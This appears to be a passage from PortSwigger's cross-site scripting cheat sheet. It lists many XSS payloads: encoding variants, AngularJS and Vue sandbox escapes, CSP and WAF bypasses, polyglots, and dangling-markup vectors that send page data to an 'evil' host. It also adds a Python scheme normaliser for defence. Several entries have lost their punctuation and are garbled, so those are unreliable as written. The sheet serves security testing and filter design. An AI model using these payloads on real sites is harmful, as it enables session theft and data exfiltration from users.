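`is_strict_utf8` is the check to put at the trust boundary; `find_overlong` exists to show why, by naming the code point each rejected sequence would have smuggled through. The UTF-7 decode makes the same point for a charset the server never meant to serve: a response with an explicit, fixed charset header is the fix, not a filter on "+ADw-".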

Unicode escapes
<script>\u0061lert(1)</script>

Unicode escapes ES6 style
<script>\u{61}lert(1)</script>

Unicode escapes ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes
<script>eval('\x61lert(1)')</script>

Octal encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>

Decimal encoding with optional semicolon
<a href="&#106;avascript:alert(1)">XSS</a>
<a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg>
<svg><script>&#x61;lert(1)</script></svg>
<svg><script>alert&NewLine;(1)</script></svg>
<svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semicolon, provided the next character is not a-f0-9 (the second and third vectors use a tab and a newline respectively)
<a href="j&#x61vascript:alert(1)">XSS</a>
<a href="&#x6a	avascript:alert(1)">XSS</a>
<a href="&#x6a
avascript:alert(1)">XSS</a>

Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities
<a href="javascript&colon;alert(1)">XSS</a>
<a href="java&Tab;script:alert(1)">XSS</a>
<a href="java&NewLine;script:alert(1)">XSS</a>
<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
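The Protocols section and the entity entries just above describe one decoding order: the browser decodes HTML entities in the attribute (with or without semicolon, with padded zeros, named entities such as &colon; and &Tab;), drops leading control characters and spaces, removes tab, LF and CR inside the scheme name, and only then compares the scheme case-insensitively. A check that runs before those steps, or that runs them in a different order, is the reason the variants above exist. The Python example below is added here and is not PortSwigger's code; it reproduces that order with the standard library (html.unescape implements the HTML5 character-reference rules) so that every vector in the two sections normalises to the same scheme. SCRIPT_SCHEMES and the SAMPLES list are constructed for the example; the sample strings mirror vectors on this page.

```python
import html
import re
from typing import Optional

# Schemes the Protocols section shows executing code from href/src/data/formaction. data: is
# included because the page loads script from data: in <script src>. Allowlisting http/https
# is the right policy; this set only shows what a normaliser has to see through.
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}

# Characters the page says browsers ignore in front of the scheme (\x01-\x20)...
_LEADING = "".join(chr(c) for c in range(0x01, 0x21))
# ...and inside it or between the name and the colon (\x09, \x0a, \x0d).
_INNER = re.compile(r"[\t\n\r]")
_SCHEME = re.compile(r"[a-z][a-z0-9+.\-]*")


def normalize_scheme(attribute_value: str) -> Optional[str]:
    """Return the URL scheme a browser resolves for an attribute value, or None if it has none."""
    # 1. Attribute values are entity-decoded before URL parsing. html.unescape follows the
    #    HTML5 rules the Encoding section relies on: optional semicolon, padded zeros, &#X hex,
    #    named references such as &colon; &Tab; &NewLine; &lpar; &rpar;.
    decoded = html.unescape(attribute_value)
    # 2. Leading control characters and spaces are dropped.
    stripped = decoded.lstrip(_LEADING)
    # 3. The scheme is everything before the first colon.
    head, colon, _rest = stripped.partition(":")
    if not colon:
        return None
    # 4. Tab, LF and CR inside the name are removed and the comparison is case-insensitive.
    scheme = _INNER.sub("", head).lower()
    return scheme if _SCHEME.fullmatch(scheme) else None


def is_script_url(attribute_value: str) -> bool:
    """True when the normalised scheme is one that executes code."""
    return normalize_scheme(attribute_value) in SCRIPT_SCHEMES


# Constructed attribute values mirroring the page's vectors; every one resolves to javascript.
SAMPLES = [
    "javascript:alert(1)",
    "JaVaScript:alert(1)",
    "\x01 javascript:alert(1)",
    "javas\tcript:alert(1)",
    "javascript\n:alert(1)",
    "&#106;avascript:alert(1)",
    "&#106avascript:alert(1)",
    "&#0000106;avascript:alert(1)",
    "j&#x61vascript:alert(1)",
    "&#x6a\tavascript:alert(1)",
    "&#x0000006a;avascript:alert(1)",
    "&#X6A;avascript:alert(1)",
    "javascript&colon;alert(1)",
    "java&Tab;script:alert(1)",
    "java&NewLine;script:alert(1)",
    "javascript&colon;alert&lpar;1&rpar;",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(repr(value), "->", normalize_scheme(value))
```

Use `normalize_scheme` with an allowlist (`in {"http", "https", "mailto"}`) rather than `is_script_url`: the normaliser is what makes the comparison meaningful, and an allowlist does not need updating when the next executable scheme appears. The URL-encoding entries (`%27`) are inside the JavaScript body rather than the scheme, which is why they need no handling here; the scheme decision is already made by then.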

Obfuscation

Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)')}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
>= 1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>= 1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>= 1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil

Link href stylesheet ltlink rel=stylesheet href=evil

Link href icon ltlink rel=icon href=evil

Meta refresh ltmeta http-equiv=refresh content=0 httpevil

Img to pass markup through src attribute ltimg src=evil ltimage src=evil

Video using track element ltvideogtlttrack default src=evil

Video using source element and src attribute ltvideogtltsource src=evil

Audio using source element and src attribute ltaudiogtltsource src=evil

Input src ltinput type=image src=evil

Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil

Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil

Form using action ltbutton form=x style=width100height100gtltform id=x action=evil

Object data ltobject data=evil

Iframe src ltiframe src=evil

Embed src ltembed src=evil

Embed src ltembed src evil

Use textarea to consume markup and post toexternal site

ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt

Pass markup data through windowname using formtarget

ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=

Pass markup data through windowname using basetarget

lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=

Pass markup data through window.name using formtarget

ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=

Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil

Using embed window name to pass data from the page

ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using iframe window name to pass data from the page

ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using object window name to pass data from the page

ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Using frame window name to pass data from the page

ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=

Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil

Polyglots

Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt

Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt

Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt

WAF bypass global objects

XSS into a JavaScript string: string concatenation (window) window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (self) self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (this) this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (top) top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (parent) parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (frames) frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: string concatenation (globalThis) globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string: comment syntax (window) window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (self) self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (this) this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (top) top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (parent) parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (frames) frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: comment syntax (globalThis) globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string: hex escape sequence (window) window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (self) self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (this) this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (top) top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (parent) parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (frames) frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence (globalThis) globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string: hex escape sequence and base64 encoded string (window) window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (self) self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (this) this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (top) top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent) parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames) frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis) globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string: octal escape sequence (window) window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (self) self['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (this) this['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (top) top['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (parent) parent['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (frames) frames['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: octal escape sequence (globalThis) globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string: unicode escape (window) window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (self) self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (this) this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (top) top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (parent) parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (frames) frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: unicode escape (globalThis) globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string: RegExp source property (window) window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (self) self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (this) this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (top) top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (parent) parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (frames) frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string: RegExp source property (globalThis) globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string HieroglyphyJSFuck(window)

window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(self)

self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(this)

this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(top)

top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(parent)

parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(frames)

frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Impossible labs

Classic vectors (XSS crypt)

Image src with JavaScript protocol <img src=javascript:alert(1)>

Body background with JavaScript protocol <body background=javascript:alert(1)>

Iframe data URLs no longer work, as modern browsers use a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

Title Description Length limit Closest vector Link

Basic context, WAF blocks <[a-zA-Z]

This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.

N/A N/A

Script based injection, but quotes, forward slash and backslash are escaped

We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.

The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.

N/A N/A

innerHTML context, but no equals allowed

You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.

N/A N/A

Basic context, length limit

This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q oncut=alert``, but can you beat it?

15 <q oncut=alert``

Attribute context, length limit

The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?

14 oncut=alert``

Basic context, length limit, arbitrary code

It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.

19 <q oncut=eval(name)

Attribute context, length limit, arbitrary code

Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.

17 See link

Injection occurs inside a frameset but before the body

We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.

N/A N/A

Injection occurs inside single quoted string, only characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.

N/A N/A

VBScript protocol used to work in IE <a href=vbscript:MsgBox+1>XSS</a> <a href='' onclick=vbs:Msgbox+1>XSS</a> <a href='' onclick=VBS:Msgbox+1>XSS</a> <a href='' onclick=vbscript:Msgbox+1>XSS</a> <a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE

<a href='' onclick=jscript.compact:alert(1)>test</a> <a href='' onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in Netscape Navigator

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions <=IE7 <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of : <div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>

Behaviors for older modes of IE <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt


ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt

GreyMagic HTML+time exploit (no longer works, even in 5 docmode)

ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside opening comments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have an onload event inside SVG

<svg><xss onload=alert(1)>

Isindex using src attribute ltisindex type=image src=evil

Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil

Isindex and formaction <isindex type=submit formaction=javascript:alert(1)>

Isindex and action <isindex type=submit action=javascript:alert(1)>

Credits: Brought to you by PortSwigger, lovingly constructed by Gareth Heyes

